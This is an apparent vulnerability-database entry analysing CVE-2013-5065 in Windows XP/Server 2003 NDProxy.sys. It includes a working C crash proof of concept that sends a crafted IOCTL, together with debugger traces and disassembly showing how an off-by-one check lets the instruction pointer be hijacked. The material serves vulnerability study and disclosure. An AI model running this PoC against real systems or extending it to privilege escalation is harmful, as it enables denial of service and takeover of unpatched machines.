
CVE-2013-5065 Microsoft NDProxy.sys Privilege Escalation

Disclosure Date: November 28, 2013
Exploited in the Wild

Description

NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.

Technical Analysis

A local kernel vulnerability in Windows XP was recently disclosed; the sample is said to have been extracted from the Adobe 0day attack captured by FireEye, making it a second 0day in that attack.

PoC

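#include <windows.h>
#include <stdio.h>

// Crash PoC for CVE-2013-5065 (NDProxy.sys on XP SP2/SP3 and Server 2003 SP2).
//
// Opens the \\.\NDProxy device and issues IOCTL 0x8fff23cc with an input
// buffer whose DWORDs at offsets 0x14 and 0x1c are set so that the handler's
// index check in PxIODispatch (`v18 <= 0x24`, see the pseudocode in the
// analysis) admits index 0x24; the dispatcher then calls through a table slot
// outside the checked range and the machine blue-screens.
//
// Returns 0 once the IOCTL has been issued, 1 if the device could not be opened.
int main(void)
{
    HANDLE hDev = CreateFile("\\\\.\\NDProxy",
                             GENERIC_READ | GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE,
                             NULL, OPEN_EXISTING, 0, NULL);
    if (hDev == INVALID_HANDLE_VALUE)
    {
        // GetLastError() returns a DWORD, so %lu rather than %d.
        printf("CreateFile Error:%lu\n", GetLastError());
        // The original fell through here and used the invalid handle.
        return 1;
    }

    // 0x15 DWORDs = 0x54 bytes, the input size passed below; the output
    // size passed is 0x24 bytes (the handler rejects either below 0x24).
    DWORD inbuf[0x15] = {0};
    DWORD dwRetBytes = 0;

    // Offset 0x14: the handler subtracts 0x7030101 from this DWORD and uses
    // the result (0x24 here) as a table index; the `<= 0x24` check lets it through.
    inbuf[5] = 0x7030125;
    // Offset 0x1c: compared against the table entry selected by that index
    // (in the author's run that entry read as 0x34, so the compare passes).
    inbuf[7] = 0x34;

    // On a vulnerable system this call does not return; the kernel faults in
    // PxIODispatch with eip taken from the out-of-range table slot.
    if (!DeviceIoControl(hDev, 0x8fff23cc, inbuf, 0x54, inbuf, 0x24, &dwRetBytes, NULL))
    {
        printf("DeviceIoControl Error:%lu\n", GetLastError());
    }
    CloseHandle(hDev);
    return 0;
}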

Details

Compiling and running this directly on XP SP3 causes a blue screen. Attaching the debugger shows the following
exception:

Access violation - code c0000005 (second chance!!!!!!)
 00000038 ?????
  kd> r
  eax = 000001B0 ecx = 00000000 ebx = 81e16d80 edx = 00000000 ESI = 81f31a30 edi = f88f273c
  eip = 00000038 esp = b203ec18 ebp = b203ec34 iopl up EI pl = 0 NV NZ Na PO NC
  cs = 0008 SS = 0010 DS = 0023 es = 0023 fs = 0030 GS = 0000 efl = 00010202
  00000038??
kd> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP Not in . any known Module Following frames May be wrong.
b203ec14 f88ed145 81f31a30 81a76c10 81f2b2c0 0x38
b203ec34 804ef129 81f46ed8 000001B0 806d32d0 NDProxy!PxIODispatch+0x2b3
b203ec44 80575dde 81e16df0 81a76c10 81e16d80 nt!IopfCallDriver+0x31
b203ec58 80576c7f 81f46ed8 81e16d80 81a76c10 nt!IopSynchronousServiceTail+0x70
b203ed00 8056f4ec 000007e8 00000000 00000000 nt!IopXxxControlFile+0x5e7
b203ed34 8053e648 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
b203ed34 7c92e4f4 000007e8 00000000 00000000 nt!KiFastCallEntry+0xf8
0012fe4c 7c92d26c 7c801675 000007e8 00000000 ntdll!KiFastSystemCallRet
0012fe50 7c801675 000007e8 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
0012feb0 004010c2 000007e8 8fff23cc 0012ff28 0x7c801675
0012ff80 004012e9 00000001 00380fc0 00381058 0x4010c2
0012ffc0 7c817067 00241fe4 0012f7bc 7ffde000 0x4012e9
0012fff0 00000000 00401200 00000000 78746341 0x7c817067

Using IDA, locate where this IOCTL code is handled in PxIODispatch:

if (v7 == 0x8FFF23C8 | | v7 == 0x8FFF23CC )
    {
      V17 = LockState ;
      if (LockState <0x24 | | V6 <0x24)
      {
        v8 = - 1,073,741,820 ;
         GOTO LABEL_70 ;
      }
      v18 = * (_DWORD *) (v5 + 20 ) - 117637377 ;
       v36 = 36 ;
       if ((unsigned int ) v18 <= 0x24)

Restart, then set a breakpoint on the handler:

kd> bp NDProxy! PxIODispatch
kd> BL
0 e f888ce92 0001 (0001) NDProxy! PxIODispatch
kd> g

Run the PoC; the breakpoint hits at the handler entry. Cross-referencing with IDA:

v36 = 0 ;
   v2 = LockState ;
   v3 = * (_DWORD *) (LockState + 0x60) ;
   v4 = * (_BYTE *) v3 == 14 ;
   v5 = * (_DWORD *) (LockState + 0xC) ;/ / LockState + 0xC exactly InBuf pointer
   LockState = * (_DWORD *) (v3 + 8 ) ;
   V6 = * (_DWORD *) (v3 + 4 ) ;
   v35 = * (_DWORD *) (v3 + 4 ) ;
kd> dd esp
b20b5c38 804ef129 8212b488 81b28ce8 806d32d0
b20b5c48 80575dde 81b28d58 81ace8a8 81b28ce8
b20b5c58 b20b5d00 80576c7f 8212b488 81b28ce8
b20b5c68 81ace8a8 0012ff00 b20b5d01 b20b5d01
b20b5c78 00000002 b20b5d64 0012fe80 8056f4c2
b20b5c88 80545edc 0012019f 00000000 00000003
00000012 c0100080 b20b5c98 8218aa28 00000e3c
b20b5ca8 00000000 00000e40 00000000 81ace8ec
kd> dd 81b28ce8 +0 XC
81b28cf4 8212d490 8218ac38 8218ac38 00000000
00000000 01010001 0c000000 81b28d04 0012fe8c
81b28d14 00000000 00000000 00000000 00000000
00000000 00000000 00000000 81b28d24 0012ff28
81b28d34 8218aa28 00000000 00000000 00000000
00000000 81b28d58 81ace8a8 81b28d44 00000000
81b28d54 00000000 0005000e 00000024 00000054
00000000 8212b488 81ace8a8 81b28d64 8fff23cc
kd> dd 8212d490
8212d490 00000000 00000000 00000000 00000000
00000000 07030125 00000000 00000034 8212d4a0
8212d4b0 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 8212d4c0
8212d4d0 00000000 00000000 00000000 00000000
8212d4e0 00000000 00000000 0001000c 81ecdbf0
8212d4f0 0a060001 ee657645 00000001 00000001
00000000 81e55408 00000000 821b6980 8212d500

Look directly at where the IOCTL code is handled:

if (M_iocode == 0x8FFF23C8 | | M_iocode == 0x8FFF23CC )
    {
      V17 = LockState;
       if (LockState < 0x24 | | V6 < 0x24 )
      {
        v8 = 0xC0000004u ;
         GOTO LABEL_70;
      }
      v18 = * (_DWORD *) (v5 + 0x14 ) - 0x7030101 ;/ / v5 +0 x14 == 0x7030125
      v36 = 36 ;
       if ((unsigned int ) v18 <= 0x24 ) == 0x24 v18
      {
        v19 = * (_DWORD *) (v5 + 0x1c ); / / v19 = 0x34
        v20 = 3 * v18;
        v21 = v19 < dword_F8892004 [v20] ;/ / dword_F8892004 [v20] is exactly equal to 0x34
        LockState = v20 * 4 ;/ / v5 is assigned here
         if (v21 | | v19> V17 - 32 ) / / skip this if
        {
          * (_DWORD *) (V5 + 16 ) = 0xC0012019u ;
        }
        else / / enter here
        {
          V22 = KfAcquireSpinLock (& SpinLock);
          byte_F8892740 = V22;
           if (TspCB)
          {
            LOBYTE (v23) = V22;
            KfReleaseSpinLock ( & SpinLock, v23);
            * (_DWORD *) (v5 + 16 ) = 4097 ;
          }
          else
          {
            + + dword_F8892734;
             if ((unsigned int ) dword_F8892734> 0xFFFFFFFE )
              dword_F8892734 = - 2147483647 ;
            * (_DWORD *) (v5 + 12 ) = dword_F8892734;
            * (_DWORD *) (v5 + 8 ) = v2;
            LOBYTE (v23) = byte_F8892740;
            KfReleaseSpinLock ( & SpinLock, v23);
            * (_BYTE *) (* (_DWORD *) (v2 + 96 ) + 3 ) | = 1u ;
            V24 = (* ( int (__ stdcall **) ( int )) (( char *) & off_F8892008 + LockState)) (v5) ;/ / here exception of
             if (V24 == 259 )
               return 259 ;
            v36 = v35;
             if (v35> = * (_DWORD *) (v5 + 28 ) + 36 )
              v36 = * (_DWORD *) (v5 + 28 ) + 36 ;
            * (_DWORD *) (v5 + 16 ) = V24;
            _InterlockedExchange ((Signed __ Int32 *) (v2 + 56 ), 0 );
          }
        }
      }

The corresponding assembly is as follows:

text: F885D0AD loc_F885D0AD:; CODE XREF: PxIODispatch (x, x) +20 D J
. text: F885D0AD mov ecx, [ESI +1 Ch] / / ESI +1 c controllable
text: F885D0B0 lea eax, [eax + eax * 2. ] / / eax controllable
text:. F885D0B3 shl eax, 2
text:. F885D0B6 cmp ecx, dword_F8862004 [eax]
text:. F885D0BC mov dword ptr [ebp + LockState.LockState], eax / / pollution LockState.LockState
text.: F885D0BF JNB short loc_F885D0CD
. text: F885D0C1
text: F885D0C1 loc_F885D0C1:;. CODE XREF: PxIODispatch (x, x) +240 J
text: F885D0C1 mov dword ptr [ESI +10 h], 0C0012019h.
text: F885D0C8 jmp loc_F885D172.
...
. Text: mov eax F885D134, [ebx +60 h]
text:. F885D137 or byte ptr [eax +3], 1
text:. F885D13B mov eax, dword ptr [ebp + LockState.LockState] / / pollution eax
text:. F885D13E PUSH ESI
. text: F885D13F Call off_F8862008 [eax]; Exception!
The tainted eax is used as an index into the off_F8862008 table, and the value read there is loaded into eip.
kd> g
Breakpoint 2 HIT
NDProxy!PxIODispatch+0x2ad:
f885d13f ff90082086f8    call dword ptr NDProxy!TapiOids+0x8 (f8862008)[eax]
kd> r
eax = 000001B0 ecx = 00000000 ebx = 81e2c2f8 edx = 00000000 ESI = 81cc9368 edi = f886273c
eip = f885d13f esp = b1bd9c1c ebp = b1bd9c34 iopl up EI pl = 0 NV NZ Na PO NC
cs = 0008 SS = 0010 DS = 0023 es = 0023 fs = 0030 GS = 0000 efl = 00000202
NDProxy!PxIODispatch+0x2ad:
f885d13f ff90082086f8    call dword ptr NDProxy!TapiOids+0x8 (f8862008)[eax]  ds:0023:f88621b8=00000038

Here eax = 0x1b0, i.e. 0x24 * 3 * 4. Because the handler's check is `v18 <= 0x24` rather than `v18 < 0x24`, index 0x24 is accepted, and the DWORD read at f8862008 + 0x1b0 (= f88621b8, value 00000038) is what gets called — hence eip = 0x38 in the crash above.

Exploitation beyond a crash is not worked out here; one would expect that controlling the memory at the location eax indexes would allow executing shellcode.

CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • microsoft

Products

  • windows 2003 server
  • windows xp
